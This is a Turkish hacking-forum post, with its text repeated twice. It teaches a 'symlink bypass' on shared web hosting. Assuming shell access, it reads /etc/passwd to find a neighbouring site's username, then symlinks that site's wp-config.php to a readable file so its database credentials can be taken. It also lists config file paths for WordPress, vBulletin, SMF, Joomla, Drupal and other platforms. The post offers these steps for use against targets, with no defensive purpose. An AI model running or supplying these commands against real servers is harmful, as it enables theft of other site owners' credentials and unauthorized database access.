Skeptical
New member
Komut satırının açık olduğunu varsayıyorum..
İlk önce bulunduğumuz sitenin configini okumak istersek scriptine bakmalıyız (WORDPRESS ,VBULLETIN,SMF,PHPBB vs..)
Sitemizin smf olduğunu varsayıyorum.
/home/skeptical/public_html genellikle config bu bölümde olur.
Config yolları
Yani Smfnin = Settings.php dir.
Sonra dosya editleme satırına :
/home/skeptical/public_html/Settings.php yazarak içini görebilir okuyabilir ve SQL Bağlanabiliriz.
Gelelim şimdi hedef sitenin configini okumaya..Burda symlink bypass yöntemini kullanacağız..
Hedef sitemizin wordpress olduğunu sayıyorum..
Komut satırında :
Cat /etc/passwd yazarak hedef sitemizin kullanıcı adını buluyoruz..
Daha sonra tekrar komut satırına gelerek
Ln –s /home/hedef/public_html/wp-config.php die.txt
Yazıyoruz ve enterliyoruz.Enterlediğimizde eğer symlink bypass engelli değilse die.txt adında dosya oluşacaktır ve o dosyada hedef sitemizin configi ellerimizin altında olacaktır..
İlk önce bulunduğumuz sitenin configini okumak istersek scriptine bakmalıyız (WORDPRESS ,VBULLETIN,SMF,PHPBB vs..)
Sitemizin smf olduğunu varsayıyorum.
/home/skeptical/public_html genellikle config bu bölümde olur.
Config yolları
Kod:
php nuke -> . /config.php
vbulettin->. /includes/config.php
mybb -> . /inc/config.php
phpbb -> . /config.php
smf -> Settings.php
joomla -> configuration.php , configuration.php-dist
wordpress -> wp-config.php
seditio -> datas/config.php
drupal sistem:/home/user/public_html/sites/default/settings.php
setidio:/home/site/public_html/datas/config.php
vbulletin: /home/site/public_html/includes/config.php
vbulletin: /home/site/public_html/includes/class_core.phpYani Smfnin = Settings.php dir.
Sonra dosya editleme satırına :
/home/skeptical/public_html/Settings.php yazarak içini görebilir okuyabilir ve SQL Bağlanabiliriz.
Gelelim şimdi hedef sitenin configini okumaya..Burda symlink bypass yöntemini kullanacağız..
Hedef sitemizin wordpress olduğunu sayıyorum..
Komut satırında :
Cat /etc/passwd yazarak hedef sitemizin kullanıcı adını buluyoruz..
Daha sonra tekrar komut satırına gelerek
Ln –s /home/hedef/public_html/wp-config.php die.txt
Yazıyoruz ve enterliyoruz.Enterlediğimizde eğer symlink bypass engelli değilse die.txt adında dosya oluşacaktır ve o dosyada hedef sitemizin configi ellerimizin altında olacaktır..